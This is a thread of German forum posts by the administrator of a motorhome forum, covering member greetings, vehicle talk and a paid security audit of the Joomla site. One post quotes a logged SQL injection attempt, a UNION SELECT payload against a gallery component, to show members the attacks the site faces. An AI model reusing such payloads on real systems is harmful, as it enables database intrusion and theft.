Beiträge von Hartmut

Moin Anke und Volker,

Glücklicherweise nur eine kleine Ursache. Leider wird immer mal wieder gepfuscht, bzw. unaufmerksam gearbeitet.

Ich kann daraus zwar nicht unbedingt eine fehlende Endkontrolle ableiten, weil es sich wohl eher um einen versteckten Fehler handelt und eine Endkontrolle ja immer nur falsche Funktionen oder offensichtliche, optisch erkennbare, Mängel aufdecken kann, aber die Mitarbeiter im Werk sollten schon irgendwie motiviert werden, zielorientiert und mit einem gewissen Qualitätsanspruch an die Sache heran zu gehen.

Moin,

Zitat

Nur war da keine neue Nachricht von Dir, wie kannst Du Dir das erklären.

Ganz einfach, ich hatte versehentlich auf absenden gedrückt, obwohl ich das noch gar nicht wollte. Da ich aber keine Zeit mehr hatte, den Beitrag auszuformulieren, habe ich ihn kurzerhand wieder gelöscht und dann später im Büro wieder eingestellt

Also, kein Fehler im System...

Wenn Fragen, dann fragen , ich erkläre es wirklich gern, wenn es die Zeit erlaubt.

Moin,

das mit dem Schulen ist so eine Sache, das kann sich eigentlich nur auf die Verwaltung beschränken, nicht auf die IT selbst.

Die IT lernt man wirklich nicht mal eben zwischendurch , ich beschäftige mich seit nunmehr fast 25 Jahren damit, und stoße immer wieder an meine Grenzen

Sicher kann man Programme beherrschen lernen, aber das reicht nur solange aus, bis etwas in die Hose geht..., denn dann fängt man an, im eigentlichen Code zu suchen und zu korrigieren, sofern man etwas findet.

Korrigieren kann man aber nur, wenn man beim Auftreten des Fehlers dabei war und genau weiß, was passiert ist. Ansonsten kann man nur raten, und das führt meist dazu, dass am Ende alles durcheinander ist

Da halte ich es für eine bessere Sache, wenn Ihr Euch mal ins Backend einloggt, einfach mal stöbert und dann gezielt fragt. Ich kann dann versuchen, Euch gezielt ein wenig schlauer zu machen

Moin,

Zitat

Was spricht dagegen wenn es auf 30 Minuten begrenzt wird, im schlimmsten Fall wenn man länger Online ist, muß man sich neu Einloggen.

Das kommt ja auch nur zum Tragen, wenn man inaktiv online ist. Solange man aktiv ist, d.h. verschiedene Seiten aufruft, läuft die Zeit nicht.

Zitat

Was wäre auf längere Sicht die Beste und nicht so Kostenintensivere Investition?

Die Anschaffung eigener Software mag im ersten Ansatz vielleicht etwas teurer sein (hält sich aber sicher noch im verfügbaren Rahmen), und ist sicher am Anfang auch ein wenig zeitintensiver. Auf längere Sicht jedoch ist das sicher die günstigere Alternative.
Investitionen zahlen sich ja in der Regel nicht unmittelbar, nachdem sie getätigt wurden, aus, sondern es bedarf einer gewissen Zeit.

Zitat

Das man selbst Hand anlegen müßte, würde ich an Deiner Stelle auch in Kauf nehmen, in Fremde Hände würde ich mich auch nicht so ohne weiteres begeben, man ist dann Irgendwie Abhängig

Genau, die Abhängigkeit, der man sich aussetzt, wenn man das in fremde Hände legt, ist es, die mich zweifeln lässt, ob das eine gute Alternative ist.

Zitat

Du hast Dir die Frage ja schon selbst beantwortet, und verstehe Deine Bedenken.

Das stimmt natürlich, Herwig! Es ist, auf Basis der verfügbaren Informationen und Argumente eigentlich keine Frage mehr..., dennoch möchte ich, da wir vier hier ein Team sind, solche Entscheidungen möglichst im Konsens herbeigeführt wissen. Es ist nicht meine Art, den "Patriarchen" zu spielen und "über die Köpfe hinweg" zu entscheiden :cheer: .
So handhabe ich das hier bei mir in der Firma auch, mit ziemlichem Erfolg, über -zig Jahre
Manchmal kommt es zwar vor, dass ich mich über eine Mehrheitsmeinung hinweg setzen muss, aber so ist das nun mal, wenn man "den Hut auf hat". Dafür trägt man ja letztendlich auch die Verantwortung.

Udo, Heiner????

So!

Die Katze ist aus dem Sack!

Es sind bei dem sehr intensiven Audit des Forums doch so einige Sicherheitslücken zum Vorschein gekommen.

Einige davon sind eigentlich eher dem Umstand geschuldet, dass ich in den vergangenen Monaten zu wenig Zeit hatte um, zeitnah nach den Veröffentlichungen, entsprechende Aktualisierungen vor zu nehmen. Dieses bringt schon mal einen erheblichen Sicherheitsgewinn, wenngleich es natürlich keine Garantie darstellt (aber die gibt es ohnehin nie )

Weiterhin sollte ich die Rechte an den ca. 44.000 Dateien mal im Einzelnen überprüfen, was für sich allein schon ein Job für ein Jahr wäre..., dafür gibt es aber Software, die das für einen erledigt, die werde ich wohl anschaffen.

Ein weiteres Manko ist die Sitzungsdauer, die ich auf mehrfachen Wunsch ja mal auf 1 Stunde gesetzt hatte. Optimal wären 15 Minuten, ich werde sie aber mal auf 30 Minuten verkürzen.

Darüber hinaus sind natürlich ein paar Komponenten installiert und teilweise auch aktiv, die wir gar nicht benötigen, bzw. auch gar nicht benutzen. Einige davon sind standardmäßig mit vorgesehen, andere hatte ich wohl mal zum Testen installiert und dann nicht wieder entfernt...

Das Datenbankpasswort war dann am Ende doch nicht so toll, wie ich dachte..., nach schlappen 6 Stunden war es doch geknackt .Dafür gibt es bestimmte Vorgehensweisen, eine davon nennt sich "Brute Force", dann wird per Zufallsgenerator so lange probiert, bis es passt.

Aaaaber, die gute Nachricht: Es ist bislang noch niemandem gelungen, einzudringen, und auch der Auditor hat es schließlich nur geschafft, weil ich ihn reingelassen habe.

Ich möchte es aber nun nicht dabei bewenden lassen, sondern muss mehr für die Sicherheit tun. Ein Weg wäre vielleicht ein solches Abo abzuschließen (€ 300,00/Jahr), ein anderer wäre, sich die notwendigen Tools (Software) anzuschaffen, die die Arbeit zwar nicht allein machen, aber nach einmal erfolgter Anpassung an die eigenen Bedürfnisse einfach eine Menge Zeit sparen und die Verwaltung einfach erleichtern.

Zeitgleich möchte ich noch ein paar (kostenpflichtige) Sicherheitskomponenten einbauen.

Der Vorteil dabei wäre, dass die Software immer verfügbar ist, ich nach wie vor alle Freiheiten habe, etwas zu testen und zu verändern und wir lediglich ab und an diese Tools aktualisieren müssten (wenn man sie denn erst mal hat)

Der Nachteil dabei ist, dass man natürlich noch immer selbst Hand anlegen muss, doch auch sonst möchte ich mich einfach in dei Hände eines Fremden begeben...

Wie schon gesagt, wenn man bereit ist, alles "outzusourcen", wie man wohl in Neudeutsch sagt, ist es natürlich bequem und auch zunächst mal sicher, man begibt sich aber auch in eine gewisse Abhängigkeit, und damit habe ich -offen gestanden- ein Problem.

Der Nachteil einer so genannten externen Betreuung liegt einfach darin, dass ich nicht mehr einfach etwas machen kann, ohne den Wartungsvertrag zu verletzen und es eigentlich vorprogrammiert ist, dass der Vertrag so immer wieder in Frage gestellt würde. Das ist mir auf die Dauer zu anstrengend, ganz ehrlich :unsure:

Was meint Ihr, technisch aufrüsten und weitermachen, oder "outsourcen"?

Moin Udo,

stimmt.

6,80 m

Wenn es Euch da man nicht zu eng drinnen wird

Zitat

Das sind ja ganze stolze 400/mm in mm sieht es schon nach etwas mehr aus.

Das sind 1.400 mm, Herwig.

Ich finde, das ist ein erheblicher Unterschied.

In der Hauptsaison steht unser Bunker auch nur auf dem Hof..., auch wenn er mit den Hufen scharrt, wir tun uns das nicht mehr an.

Das wäre auch mein Gedanke gewesen.

Wenn die Reparatur gut gemacht wird, und davon muss man ja ausgehen, würde ich auch dazu tendieren.

Es sei denn, Du kriegst für Deinen, so wie er ist, 25.000, streichst die 18.500 ein und legst noch einmal 15.000 drauf. Dann kriegst Du natürlich auch 'ne Sphinx (oder ähnliches)

Moin Klaus,

HERZLICH WILLKOMMEN hier im Forum.

Du wirst sehen, Du findest hier sicherlich, was Du suchst.

Viel Spaß hier und vor Allem mit dem T500

Moin,

leg man los, Heiner. Je eher wir das in Sack und Tüten haben, desto besser.

er wird immer komischer...

Moin,

Zitat

Einerseits ist es ja gut dass der Scan nichts ergeben hat, anderseits wie Du schon sagst aber doch wieder nicht es nicht möglich war auf die Datenbank zuzugreifen.

Nein, Nein, da habe ich mich nicht klar genug ausgedrückt, aus meiner Sicht gibt es keine Probleme, nur der externe Spezi konnte nicht drauf. Vielleicht, weil sie so gut gesichert ist?

Nun habe ich die Sicherung mal ein wenig gelockert, mal sehen, ob ihm das am Montag gelingt, wenn nicht, tja dann ist auch alles gut.

Ja, man baut eventuell selber einen Fehler ein, trotzdem läuft vielleicht alles rund, aber eine Sicherheitslücke, die dadurch entstanden sein könnte, bleibt unächst unentdeckt. Wenn sie dann von einem Hacker gefunden wird....

Ich bin auch gespannt

Der Scan hat noch gar nichts ergeben

"Leider" haben die Sicherheitsvorkehrungen dahingehend gegriffen, dass es nicht möglich war, auf die Datenbank zu kommen :woohoo: .

Deshalb habe ich heute ein paar "Sonderrechte" (zeitlich begrenzt bis Montag Abend) vergeben, damit die Datenbank auf Injektionen hin untersucht werden kann. Ich habe das zwar auch schon ein paar mal gemacht, aber nach nunmehr 4 Jahren mit dieser Datenbank ist es vielleicht mal ganz gut, wenn sich jemand anderes das mal anschaut, und sei es nur, um zu bestätigen, dass da nichts anbrennt.

Noch nichts Neues, der Scan läuft noch...

Es sind ca. 35.000 Dateien gescannt, von ca. 44.000, das dauert noch bis morgen früh

Mal schauen, wie wir dann weiter machen...

Moin Claudio,

HERZLICH WILLKOMMEN hier im Forum, wo Du ganz sicher jede Menge Antworten auf Deine Fragen bekommst. Spezialisten gibt es hier ja genug

Ja, es ist schon ärgerlich, wenn sich direkt nach dem Kauf etliche Baustellen auftun, aber -offen gestanden- nicht wirklich verwunderlich, oder?

Ich hoffe, Du gibst nicht auf und wirst aus dem AK wieder ein Top-Wohnmobil machen, mit dem es Freude macht, unterwegs zu sein.

Moin,

Solche Kommentare sind mir die liebsten...

Zitat

Also immer alle verbauten Komponenten, Module und Plugins auf dem aktuellen Stand halten.

ACH NEE! Da wäre ich nun wirklich nicht drauf gekommen..., Schlauberger!

Der hat nichts verstanden..., und weiß es nicht. Da kommentiere ich nichts mehr...

Es gibt halt immer wieder Leute, die glauben, weil sie es geschafft haben, mit Standardkomponenten eine Seite zu zusammenzustricken (zugegeben, seine sieht optisch wirklich gut aus, auch wenn sie mir zu überladen ist), sie wüssten schon alles...

Ach weißt Du, der Lollo_C betreibt ja das HOBBY-600-Forum, er nutzt die gleiche Plattform, wie ich, und meint natürlich, wie ich, etwas davon zu verstehen...

Mir gehen die Einmischungen, die sich meist nur auf sehr allgemeingültige Kommentare beschränken, ziemlich auf den Senkel, ich werde mit Sicherheit keine Sicherheitsmechanismen mit Fremden diskutieren

Was Du da siehst, ist ein Protoll eines Angriffsversuches, von denen ich zeitweise täglich bis zu 100 (es können auch mhr sein, nachgezählt habe ich nicht) bekomme.

Es zeigt auf, mit welchen Befehlen man versucht hat, in die Datenbank zu kommen. Die Befehle werden meist mit einem Zufallsgenerator erzeugt, und man kann, wenn man Pech hat, sein ganzes Leben damit verbringen, eine Datenbank zu knacken. Man kann aber auch Glück haben... und ist sehr schnell drinnen.

Das Protkoll wird von einem Sicherheitsmechanismus erzeugt, welcher in unserer Plattform eingebaut ist.

Ob Lollo_C auch so etwas hat, weiß ich nicht, nur dass er kein JOOMLA-Guru ist, das weiß ich :cheer:

Moin Wilfried,

über Registrierung etc. ist uns schon lange nicht mehr so leicht beizukommen:-) , da ich jede Anmeldung selbst verifiziere und freischalte.

Die Angriffe, oder besser gesagt, die Versuche erfolgen direkt auf die Datenbank. Jedes Anklopfen wird dabei protokolliert und ich bekomme eine Mail.

Zitat

** -- [GET:id] => -270 -- 1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13,14 from information_schema.tables where table_name=0x4348415241435445525f53455453 --
** -- [REQUEST:id] => -270 -- 1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13,14 from information_schema.tables where table_name=0x4348415241435445525f53455453 --

**PAGE / SERVER INFO

*REMOTE_ADDR :
212.193.234.176

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_ponygallery&Itemid=131&func=detail&id=-270+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453+--+

*HTTP_REFERER :
http://hobby-wohnmobilforum.de

** SUPERGLOBALS DUMP (sanitized)

*$_GET DUMP
-[option] => com_ponygallery
-[Itemid] => 131
-[func] => detail
-[id] => -270 -- 1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13,14 from information_schema.tables where table_name=0x4348415241435445525f53455453 --

*$_POST DUMP

*$_COOKIE DUMP

*$_REQUEST DUMP
-[option] => com_ponygallery
-[Itemid] => 131
-[func] => detail
-[id] => -270 -- 1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13,14 from information_schema.tables where table_name=0x4348415241435445525f53455453 --

Alles anzeigen

Diese Befehle werden automatisch erzeugt, es können also beliebig viele ohne großen Aufwand abgesetzt werden.

Bislang ist es beim "Anklopfen" geblieben, aber irgendwann passt es vielleicht :dry:

Da halte ich meine Sorge doch schon für begründet, auch wenn ich natürlich diverse Schutzmechanismen eingebaut habe. Den kostenlosen Tools vertraue ich dabei allerdings nicht wirklich, wie ich auch den ganzen Freeware-Tools aus den PC-Zeitschriften schon lange nicht mehr vertraue, da sie teilweise mehr Schaden anrichten, als sie nützen. :silly:

Moin,

nur zur Info, den Scan der Seite habe ich soeben in Auftrag gegeben. Bin gespannt, was dabei herauskommt.

Kosten schon mal: 90,00 Euro (nicht 120,00, wie zuerst genannt)